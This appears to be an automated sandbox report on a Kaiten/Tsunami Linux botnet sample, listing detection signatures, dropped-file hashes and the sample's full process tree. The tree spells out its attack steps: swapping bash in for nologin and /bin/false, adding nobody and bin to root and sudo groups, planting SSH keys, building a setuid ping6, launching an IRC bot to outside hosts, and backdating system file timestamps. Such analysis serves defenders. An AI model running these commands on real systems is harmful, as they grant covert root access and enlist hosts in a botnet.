Analysis
-
max time kernel
149s -
max time network
181s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
-
submitted
28-08-2024 20:55
General
-
Target
go
-
Size
3KB
-
MD5
7ecb186e0f39db85c9e668dcb1bac301
-
SHA1
e42e91afdad6e32858c62700dd859011b653a80c
-
SHA256
e228c6a2e62ccd691cc3534b1302a301bd6fa66e6e0c44a26677d4f00cbfa6b5
-
SHA512
b1df507c89e5ebcb615b79c36879b2cf2b81ed705878fcfc990d39c86f428743d8d2b7b27e308d52f13e407bdeed93943f4c239b273c1747bca5a37bdf4f9eb1
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 3 IoCs
-
Detects Kaiten/Tsunami payload 2 IoCs
-
Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
-
Adds new SSH keys 2 IoCs
Linux special file to hold SSH keys. The threat actor may add new keys for further remote access.
-
Modifies password files for system users/ groups 16 IoCs
Modifies files storing password hashes of existing users/ groups, likely to grant additional privileges.
-
Write file to user bin folder 1 TTPs 1 IoCs
-
Writes file to system bin folder 1 TTPs 64 IoCs
-
Changes its process name 2 IoCs
-
Reads runtime system information 18 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 36 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/go/tmp/go1⤵
- Adds new SSH keys
-
/usr/bin/gccgcc -o /usr/share/man/man1/kwk a.c2⤵
- Writes file to tmp directory
-
/usr/lib/gcc/arm-linux-gnueabihf/6/cc1/usr/lib/gcc/arm-linux-gnueabihf/6/cc1 -quiet -imultilib . -imultiarch arm-linux-gnueabihf a.c -quiet -dumpbase a.c "-march=armv7-a" "-mfloat-abi=hard" "-mfpu=vfpv3-d16" -mthumb "-mtls-dialect=gnu" -auxbase a -o /tmp/ccI4fWoc.s3⤵
- Writes file to tmp directory
-
-
/usr/local/sbin/asas "-march=armv7-a" "-mfloat-abi=hard" "-mfpu=vfpv3-d16" "-meabi=5" -o /tmp/ccq6BdR4.o /tmp/ccI4fWoc.s3⤵
-
-
/usr/local/bin/asas "-march=armv7-a" "-mfloat-abi=hard" "-mfpu=vfpv3-d16" "-meabi=5" -o /tmp/ccq6BdR4.o /tmp/ccI4fWoc.s3⤵
-
-
/usr/sbin/asas "-march=armv7-a" "-mfloat-abi=hard" "-mfpu=vfpv3-d16" "-meabi=5" -o /tmp/ccq6BdR4.o /tmp/ccI4fWoc.s3⤵
-
-
/usr/bin/asas "-march=armv7-a" "-mfloat-abi=hard" "-mfpu=vfpv3-d16" "-meabi=5" -o /tmp/ccq6BdR4.o /tmp/ccI4fWoc.s3⤵
- Writes file to tmp directory
-
-
/usr/lib/gcc/arm-linux-gnueabihf/6/collect2/usr/lib/gcc/arm-linux-gnueabihf/6/collect2 -plugin /usr/lib/gcc/arm-linux-gnueabihf/6/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/arm-linux-gnueabihf/6/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccJwVJGi.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "--sysroot=/" --build-id --eh-frame-hdr -dynamic-linker /lib/ld-linux-armhf.so.3 -X "--hash-style=gnu" -m armelf_linux_eabi -pie -o /usr/share/man/man1/kwk /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/Scrt1.o /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/crti.o /usr/lib/gcc/arm-linux-gnueabihf/6/crtbeginS.o -L/usr/lib/gcc/arm-linux-gnueabihf/6 -L/usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf -L/usr/lib/gcc/arm-linux-gnueabihf/6/../../.. -L/lib/arm-linux-gnueabihf -L/usr/lib/arm-linux-gnueabihf /tmp/ccq6BdR4.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/arm-linux-gnueabihf/6/crtendS.o /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/crtn.o3⤵
- Writes file to tmp directory
-
/usr/bin/ld/usr/bin/ld -plugin /usr/lib/gcc/arm-linux-gnueabihf/6/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/arm-linux-gnueabihf/6/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccJwVJGi.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "--sysroot=/" --build-id --eh-frame-hdr -dynamic-linker /lib/ld-linux-armhf.so.3 -X "--hash-style=gnu" -m armelf_linux_eabi -pie -o /usr/share/man/man1/kwk /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/Scrt1.o /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/crti.o /usr/lib/gcc/arm-linux-gnueabihf/6/crtbeginS.o -L/usr/lib/gcc/arm-linux-gnueabihf/6 -L/usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf -L/usr/lib/gcc/arm-linux-gnueabihf/6/../../.. -L/lib/arm-linux-gnueabihf -L/usr/lib/arm-linux-gnueabihf /tmp/ccq6BdR4.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/arm-linux-gnueabihf/6/crtendS.o /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/crtn.o4⤵
-
-
-
-
/tmp/distro./distro2⤵
-
-
/bin/rmrm -rf /sbin/nologin2⤵
-
-
/bin/rmrm -rf /usr/sbin/nologin2⤵
-
-
/bin/rmrm -rf /bin/false2⤵
-
-
/bin/cpcp /bin/bash /bin/false2⤵
- Reads runtime system information
-
-
/bin/cpcp /bin/bash /usr/sbin/nologin2⤵
- Write file to user bin folder
- Reads runtime system information
-
-
/bin/cpcp /bin/bash /sbin/nologin2⤵
- Reads runtime system information
-
-
/usr/sbin/usermodusermod -G root nobody2⤵
- Modifies password files for system users/ groups
- Reads runtime system information
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
-
/usr/sbin/usermodusermod -G root bin2⤵
- Modifies password files for system users/ groups
- Reads runtime system information
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
-
/usr/sbin/usermodusermod -G sudo nobody2⤵
- Modifies password files for system users/ groups
- Reads runtime system information
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
-
/usr/sbin/usermodusermod -G sudo bin2⤵
- Modifies password files for system users/ groups
- Reads runtime system information
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
-
/bin/rmrm -rf "/bin/.ssh/authorized*"2⤵
-
-
/bin/rmrm -rf "/usr/games/.ssh/authorized*"2⤵
-
-
/bin/mkdirmkdir /bin/.ssh -p2⤵
- Reads runtime system information
-
-
/bin/mkdirmkdir /usr/games/.ssh -p2⤵
- Reads runtime system information
-
-
/bin/mkdirmkdir /root/.ssh -p2⤵
- Reads runtime system information
-
-
/bin/mkdirmkdir /usr/games/.ssh -p2⤵
- Reads runtime system information
-
-
/usr/bin/whoamiwhoami2⤵
-
-
/bin/hostnamehostname2⤵
-
-
/bin/mkdirmkdir /root/.ssh -p2⤵
- Reads runtime system information
-
-
/usr/bin/whoamiwhoami2⤵
-
-
/bin/hostnamehostname2⤵
-
-
/bin/chmodchmod 600 /root/.ssh/authorized_keys2⤵
-
-
/bin/chmodchmod 755 /usr/games/.ssh2⤵
-
-
/bin/chmodchmod 600 /usr/games/.ssh/authorized_keys2⤵
-
-
/bin/chownchown games:games /usr/games/.ssh/2⤵
-
-
/bin/chownchown games:games /usr/games/.ssh/authorized_keys2⤵
-
-
/bin/chownchown bin:bin /usr/bin/.ssh/2⤵
-
-
/bin/chownchown bin:bin "/usr/bin/.ssh/au*"2⤵
-
-
/bin/rmrm -rf /bin/ping6 /sbin/ping62⤵
-
-
/usr/bin/gccgcc -o /bin/ping6 ping.c2⤵
- Writes file to tmp directory
-
/usr/lib/gcc/arm-linux-gnueabihf/6/cc1/usr/lib/gcc/arm-linux-gnueabihf/6/cc1 -quiet -imultilib . -imultiarch arm-linux-gnueabihf ping.c -quiet -dumpbase ping.c "-march=armv7-a" "-mfloat-abi=hard" "-mfpu=vfpv3-d16" -mthumb "-mtls-dialect=gnu" -auxbase ping -o /tmp/ccC7PMxa.s3⤵
- Writes file to tmp directory
-
-
/usr/local/sbin/asas "-march=armv7-a" "-mfloat-abi=hard" "-mfpu=vfpv3-d16" "-meabi=5" -o /tmp/ccqulGgN.o /tmp/ccC7PMxa.s3⤵
-
-
/usr/local/bin/asas "-march=armv7-a" "-mfloat-abi=hard" "-mfpu=vfpv3-d16" "-meabi=5" -o /tmp/ccqulGgN.o /tmp/ccC7PMxa.s3⤵
-
-
/usr/sbin/asas "-march=armv7-a" "-mfloat-abi=hard" "-mfpu=vfpv3-d16" "-meabi=5" -o /tmp/ccqulGgN.o /tmp/ccC7PMxa.s3⤵
-
-
/usr/bin/asas "-march=armv7-a" "-mfloat-abi=hard" "-mfpu=vfpv3-d16" "-meabi=5" -o /tmp/ccqulGgN.o /tmp/ccC7PMxa.s3⤵
- Writes file to tmp directory
-
-
/usr/lib/gcc/arm-linux-gnueabihf/6/collect2/usr/lib/gcc/arm-linux-gnueabihf/6/collect2 -plugin /usr/lib/gcc/arm-linux-gnueabihf/6/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/arm-linux-gnueabihf/6/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccGZngQC.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "--sysroot=/" --build-id --eh-frame-hdr -dynamic-linker /lib/ld-linux-armhf.so.3 -X "--hash-style=gnu" -m armelf_linux_eabi -pie -o /bin/ping6 /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/Scrt1.o /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/crti.o /usr/lib/gcc/arm-linux-gnueabihf/6/crtbeginS.o -L/usr/lib/gcc/arm-linux-gnueabihf/6 -L/usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf -L/usr/lib/gcc/arm-linux-gnueabihf/6/../../.. -L/lib/arm-linux-gnueabihf -L/usr/lib/arm-linux-gnueabihf /tmp/ccqulGgN.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/arm-linux-gnueabihf/6/crtendS.o /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/crtn.o3⤵
- Writes file to tmp directory
-
/usr/bin/ld/usr/bin/ld -plugin /usr/lib/gcc/arm-linux-gnueabihf/6/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/arm-linux-gnueabihf/6/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccGZngQC.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "--sysroot=/" --build-id --eh-frame-hdr -dynamic-linker /lib/ld-linux-armhf.so.3 -X "--hash-style=gnu" -m armelf_linux_eabi -pie -o /bin/ping6 /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/Scrt1.o /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/crti.o /usr/lib/gcc/arm-linux-gnueabihf/6/crtbeginS.o -L/usr/lib/gcc/arm-linux-gnueabihf/6 -L/usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf -L/usr/lib/gcc/arm-linux-gnueabihf/6/../../.. -L/lib/arm-linux-gnueabihf -L/usr/lib/arm-linux-gnueabihf /tmp/ccqulGgN.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/arm-linux-gnueabihf/6/crtendS.o /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/crtn.o4⤵
-
-
-
-
/bin/chmodchmod u+xs /bin/ping62⤵
-
-
/bin/cpcp /bin/ping6 /sbin/uid2⤵
- Writes file to system bin folder
- Reads runtime system information
-
-
/bin/cpcp /bin/ping6 /usr/include/bakla.h2⤵
- Reads runtime system information
-
-
/usr/bin/gccgcc -DLINUX -Wall -o /bin/cls cls.c2⤵
- Writes file to tmp directory
-
/usr/lib/gcc/arm-linux-gnueabihf/6/cc1/usr/lib/gcc/arm-linux-gnueabihf/6/cc1 -quiet -imultilib . -imultiarch arm-linux-gnueabihf -D LINUX cls.c -quiet -dumpbase cls.c "-march=armv7-a" "-mfloat-abi=hard" "-mfpu=vfpv3-d16" -mthumb "-mtls-dialect=gnu" -auxbase cls -Wall -o /tmp/ccKcucJ7.s3⤵
- Writes file to tmp directory
-
-
/usr/local/sbin/asas "-march=armv7-a" "-mfloat-abi=hard" "-mfpu=vfpv3-d16" "-meabi=5" -o /tmp/ccw6mwae.o /tmp/ccKcucJ7.s3⤵
-
-
/usr/local/bin/asas "-march=armv7-a" "-mfloat-abi=hard" "-mfpu=vfpv3-d16" "-meabi=5" -o /tmp/ccw6mwae.o /tmp/ccKcucJ7.s3⤵
-
-
/usr/sbin/asas "-march=armv7-a" "-mfloat-abi=hard" "-mfpu=vfpv3-d16" "-meabi=5" -o /tmp/ccw6mwae.o /tmp/ccKcucJ7.s3⤵
-
-
/usr/bin/asas "-march=armv7-a" "-mfloat-abi=hard" "-mfpu=vfpv3-d16" "-meabi=5" -o /tmp/ccw6mwae.o /tmp/ccKcucJ7.s3⤵
- Writes file to tmp directory
-
-
/usr/lib/gcc/arm-linux-gnueabihf/6/collect2/usr/lib/gcc/arm-linux-gnueabihf/6/collect2 -plugin /usr/lib/gcc/arm-linux-gnueabihf/6/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/arm-linux-gnueabihf/6/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccYJmpXD.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "--sysroot=/" --build-id --eh-frame-hdr -dynamic-linker /lib/ld-linux-armhf.so.3 -X "--hash-style=gnu" -m armelf_linux_eabi -pie -o /bin/cls /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/Scrt1.o /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/crti.o /usr/lib/gcc/arm-linux-gnueabihf/6/crtbeginS.o -L/usr/lib/gcc/arm-linux-gnueabihf/6 -L/usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf -L/usr/lib/gcc/arm-linux-gnueabihf/6/../../.. -L/lib/arm-linux-gnueabihf -L/usr/lib/arm-linux-gnueabihf /tmp/ccw6mwae.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/arm-linux-gnueabihf/6/crtendS.o /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/crtn.o3⤵
- Writes file to tmp directory
-
/usr/bin/ld/usr/bin/ld -plugin /usr/lib/gcc/arm-linux-gnueabihf/6/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/arm-linux-gnueabihf/6/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccYJmpXD.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "--sysroot=/" --build-id --eh-frame-hdr -dynamic-linker /lib/ld-linux-armhf.so.3 -X "--hash-style=gnu" -m armelf_linux_eabi -pie -o /bin/cls /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/Scrt1.o /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/crti.o /usr/lib/gcc/arm-linux-gnueabihf/6/crtbeginS.o -L/usr/lib/gcc/arm-linux-gnueabihf/6 -L/usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf -L/usr/lib/gcc/arm-linux-gnueabihf/6/../../.. -L/lib/arm-linux-gnueabihf -L/usr/lib/arm-linux-gnueabihf /tmp/ccw6mwae.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/arm-linux-gnueabihf/6/crtendS.o /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/crtn.o4⤵
- Writes file to system bin folder
-
-
-
-
/usr/bin/gccgcc clean.c -o /bin/clean -D Linux2⤵
- Writes file to tmp directory
-
/usr/lib/gcc/arm-linux-gnueabihf/6/cc1/usr/lib/gcc/arm-linux-gnueabihf/6/cc1 -quiet -imultilib . -imultiarch arm-linux-gnueabihf -D Linux clean.c -quiet -dumpbase clean.c "-march=armv7-a" "-mfloat-abi=hard" "-mfpu=vfpv3-d16" -mthumb "-mtls-dialect=gnu" -auxbase clean -o /tmp/ccKpizJv.s3⤵
- Writes file to tmp directory
-
-
/usr/local/sbin/asas "-march=armv7-a" "-mfloat-abi=hard" "-mfpu=vfpv3-d16" "-meabi=5" -o /tmp/cctDl9wD.o /tmp/ccKpizJv.s3⤵
-
-
/usr/local/bin/asas "-march=armv7-a" "-mfloat-abi=hard" "-mfpu=vfpv3-d16" "-meabi=5" -o /tmp/cctDl9wD.o /tmp/ccKpizJv.s3⤵
-
-
/usr/sbin/asas "-march=armv7-a" "-mfloat-abi=hard" "-mfpu=vfpv3-d16" "-meabi=5" -o /tmp/cctDl9wD.o /tmp/ccKpizJv.s3⤵
-
-
/usr/bin/asas "-march=armv7-a" "-mfloat-abi=hard" "-mfpu=vfpv3-d16" "-meabi=5" -o /tmp/cctDl9wD.o /tmp/ccKpizJv.s3⤵
- Writes file to tmp directory
-
-
/usr/lib/gcc/arm-linux-gnueabihf/6/collect2/usr/lib/gcc/arm-linux-gnueabihf/6/collect2 -plugin /usr/lib/gcc/arm-linux-gnueabihf/6/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/arm-linux-gnueabihf/6/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccBpLpXX.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "--sysroot=/" --build-id --eh-frame-hdr -dynamic-linker /lib/ld-linux-armhf.so.3 -X "--hash-style=gnu" -m armelf_linux_eabi -pie -o /bin/clean /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/Scrt1.o /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/crti.o /usr/lib/gcc/arm-linux-gnueabihf/6/crtbeginS.o -L/usr/lib/gcc/arm-linux-gnueabihf/6 -L/usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf -L/usr/lib/gcc/arm-linux-gnueabihf/6/../../.. -L/lib/arm-linux-gnueabihf -L/usr/lib/arm-linux-gnueabihf /tmp/cctDl9wD.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/arm-linux-gnueabihf/6/crtendS.o /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/crtn.o3⤵
- Writes file to tmp directory
-
/usr/bin/ld/usr/bin/ld -plugin /usr/lib/gcc/arm-linux-gnueabihf/6/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/arm-linux-gnueabihf/6/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccBpLpXX.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "--sysroot=/" --build-id --eh-frame-hdr -dynamic-linker /lib/ld-linux-armhf.so.3 -X "--hash-style=gnu" -m armelf_linux_eabi -pie -o /bin/clean /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/Scrt1.o /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/crti.o /usr/lib/gcc/arm-linux-gnueabihf/6/crtbeginS.o -L/usr/lib/gcc/arm-linux-gnueabihf/6 -L/usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf -L/usr/lib/gcc/arm-linux-gnueabihf/6/../../.. -L/lib/arm-linux-gnueabihf -L/usr/lib/arm-linux-gnueabihf /tmp/cctDl9wD.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/arm-linux-gnueabihf/6/crtendS.o /usr/lib/gcc/arm-linux-gnueabihf/6/../../../arm-linux-gnueabihf/crtn.o4⤵
- Writes file to system bin folder
-
-
-
-
/usr/bin/perlperl bot gsm.ftp.sh 1080 -bash2⤵
- Changes its process name
-
-
/usr/bin/perlperl bot irc.undernet.org 6667 -bash2⤵
- Changes its process name
-
-
/usr/bin/touchtouch -d "Dec 1 2018" /root/.ssh /root/.ssh/authorized_keys /bin/bash /bin/bunzip2 /bin/busybox /bin/bzcat /bin/bzcmp /bin/bzdiff /bin/bzegrep /bin/bzexe /bin/bzfgrep /bin/bzgrep /bin/bzip2 /bin/bzip2recover /bin/bzless /bin/bzmore /bin/cat /bin/chgrp /bin/chmod /bin/chown /bin/chvt /bin/clean /bin/cls /bin/cp /bin/cpio /bin/dash /bin/date /bin/dd /bin/df /bin/dir /bin/dmesg /bin/dnsdomainname /bin/domainname /bin/dumpkeys /bin/echo /bin/egrep /bin/false /bin/fgconsole /bin/fgrep /bin/findmnt /bin/fuser /bin/grep /bin/gunzip /bin/gzexe /bin/gzip /bin/hostname /bin/ip /bin/journalctl /bin/kbd_mode /bin/kill /bin/kmod /bin/ln /bin/loadkeys /bin/login /bin/loginctl /bin/ls /bin/lsblk /bin/lsmod /bin/mkdir /bin/mknod /bin/mktemp /bin/more /bin/mount /bin/mountpoint /bin/mt /bin/mt-gnu /bin/mv /bin/nano /bin/networkctl /bin/nisdomainname /bin/open /bin/openvt /bin/pidof /bin/ping /bin/ping4 /bin/ping6 /bin/ps /bin/pwd /bin/rbash /bin/readlink /bin/rm /bin/rmdir /bin/rnano /bin/run-parts /bin/sed /bin/setfont /bin/setupcon /bin/sh /bin/sh.distrib /bin/sleep /bin/ss /bin/stty /bin/su /bin/sync /bin/systemctl /bin/systemd /bin/systemd-ask-password /bin/systemd-escape /bin/systemd-hwdb /bin/systemd-inhibit /bin/systemd-machine-id-setup /bin/systemd-notify /bin/systemd-sysusers /bin/systemd-tmpfiles /bin/systemd-tty-ask-password-agent /bin/tailf /bin/tar /bin/tempfile /bin/touch /bin/true /bin/udevadm /bin/umount /bin/uname /bin/uncompress /bin/unicode_start /bin/vdir /bin/wdctl /bin/which /bin/ypdomainname /bin/zcat /bin/zcmp /bin/zdiff /bin/zegrep /bin/zfgrep /bin/zforce /bin/zgrep /bin/zless /bin/zmore /bin/znew /bin/.ssh/authorized_keys /bin /boot /dev /etc /home /lib /lost+found /media /mnt /opt /proc /root /run /sbin /srv /sys /tmp /usr /var /sbin/agetty /sbin/audispd /sbin/auditctl /sbin/auditd /sbin/augenrules /sbin/aureport /sbin/ausearch /sbin/autrace /sbin/badblocks /sbin/blkdeactivate /sbin/blkdiscard /sbin/blkid /sbin/blockdev /sbin/bridge /sbin/cfdisk /sbin/chcpu /sbin/ctrlaltdel /sbin/debugfs /sbin/depmod /sbin/devlink /sbin/dhclient /sbin/dhclient-script /sbin/discover /sbin/discover-modprobe /sbin/discover-pkginstall /sbin/dmsetup /sbin/dmstats /sbin/dumpe2fs /sbin/e2fsck /sbin/e2image /sbin/e2label /sbin/e2undo /sbin/fdisk /sbin/findfs /sbin/fixfiles /sbin/fsck /sbin/fsck.cramfs /sbin/fsck.ext2 /sbin/fsck.ext3 /sbin/fsck.ext4 /sbin/fsck.minix /sbin/fsfreeze /sbin/fstab-decode /sbin/fstrim /sbin/getty /sbin/halt /sbin/hwclock /sbin/ifdown /sbin/ifquery /sbin/ifup /sbin/init /sbin/insmod /sbin/installkernel /sbin/ip /sbin/ip6tables /sbin/ip6tables-restore /sbin/ip6tables-save /sbin/iptables /sbin/iptables-restore /sbin/iptables-save /sbin/isosize /sbin/kbdrate /sbin/killall5 /sbin/ldconfig /sbin/load_policy /sbin/logsave /sbin/losetup /sbin/lsmod /sbin/mke2fs /sbin/mkfs /sbin/mkfs.bfs /sbin/mkfs.cramfs /sbin/mkfs.ext2 /sbin/mkfs.ext3 /sbin/mkfs.ext4 /sbin/mkfs.minix /sbin/mkhomedir_helper /sbin/mkswap /sbin/modinfo /sbin/modprobe /sbin/nologin /sbin/pam_tally /sbin/pam_tally2 /sbin/pivot_root /sbin/poweroff /sbin/raw /sbin/reboot /sbin/resize2fs /sbin/restorecon /sbin/restorecon_xattr /sbin/rmmod /sbin/rtacct /sbin/rtmon /sbin/runlevel /sbin/runuser /sbin/setfiles /sbin/sfdisk /sbin/shadowconfig /sbin/shutdown /sbin/start-stop-daemon /sbin/sulogin /sbin/swaplabel /sbin/swapoff /sbin/swapon /sbin/switch_root /sbin/sysctl /sbin/tc /sbin/telinit /sbin/tipc /sbin/tune2fs /sbin/udevadm /sbin/uid /sbin/unix_chkpwd /sbin/unix_update /sbin/wipefs /sbin/xtables-multi /sbin/zramctl2⤵
- Adds new SSH keys
- Writes file to system bin folder
-
-
/bin/rmrm -rf a.c ".reboot*" a.c clean.c cls.c ping.c "scan*" distro go "go.tgz*" cls.c clean.c bot ping.c go "wz*"2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
381B
MD5fada28f9405c20320d0169f7549137da
SHA153f934539664a6e2c0ef06317b8518385e1272aa
SHA256e962c1d303f7d1b24325d7e8165e7b3c157455c07d666af1a5bfce4e6bcb8640
SHA512caf57f3fef4eccef88a83c74ec9b53ffffe52bfc6ba809957991beedebf581f427994a59bdec5cb9e5c9b361e6c646501f952d7941acc4ef90721f7bc6399784
-
Filesize
23KB
MD55077d7f34484bd04fa678bab2fb5cb1b
SHA1ba564bc70b298cd6d3dec00bb2cc5a13fdcbc7cf
SHA256ed4a43245bea06d237f37a346a6e737070330b5e1709378037794ddd6460a01c
SHA512246b292f5f2deea58825c3871ef8c5ed838465d0685f6b3dc6a737991206db9e8638837ce5db1df547b4a0c73b81ac4df68734856d68ef84a0387ed8e5050d77
-
Filesize
17KB
MD50592448c69a963796044b08de9688f82
SHA15a10d5e6ff6037762df5cab411943432e32851c6
SHA256237bed898e27d5117bdecd00962ab599b081c427b2ee3374a43e61b7880cd9ff
SHA51264afb0a2ac1f83e25f9f5038270dc57dcb7136fd2a7d5fd7c3b8526f17a6177a1348d7b78c9a0a8e2540abac3c3ddf60ccf31aa7a3ccf188cdf150ae4ee20b3f
-
Filesize
725KB
MD5c119e30e6cf65d40abec2ebdc4f1e9cb
SHA167fd5fdf3161a0c086932074844a8bbf444b8911
SHA2566b66d1462c569b1fd6de35d4a4efc7dfbd8bfe59a20c9a17b506ac468abf098b
SHA5122d8e1a6820e206e43c0449bbe4b613d19d63853270b3d0bdc5be12d4bcab89dcd4f5def8a81126d51984a9e8169526d1b44996a2c0a18bfb1d764040c865fe89
-
Filesize
8KB
MD54f814f8b5924e9b9173abcc080f95490
SHA1661078ab611227a3c751dfdefce7f4d1409ddd36
SHA256f692d200fcfca0b6ec37b36e96c326d3a7ceb86f9a6dfc64bae36c27385ee8f5
SHA512eca019e4cc2b998daced1436b9d3a9b885359dd8235210b751f315883fd70d8cbcf424852ae037ea2f813aad17ec645934d762d28e9bcd51a7dfd00db61bdb17
-
Filesize
705B
MD5cf124b9edd110708e2b22b758ad0d835
SHA15d07eabc77d7f46283cea67ac8a89208956c3eaa
SHA2565561a4c4229ed03e9a63526205ee0a8c9f012bd8bab8feef18126598ee3f1517
SHA512076423cc2d6954d7ccfa1b70f75d4f137ceda38eeb8e69c79d146de2a307292b922145d2888b4794ec9e22584609d2d156975a286b0245307fcdc777c0d60512
-
Filesize
709B
MD5c6129bfd885a1213cd7ad471efb3ba74
SHA1b5e523796bdab13a8fb71f7c5072df649709474b
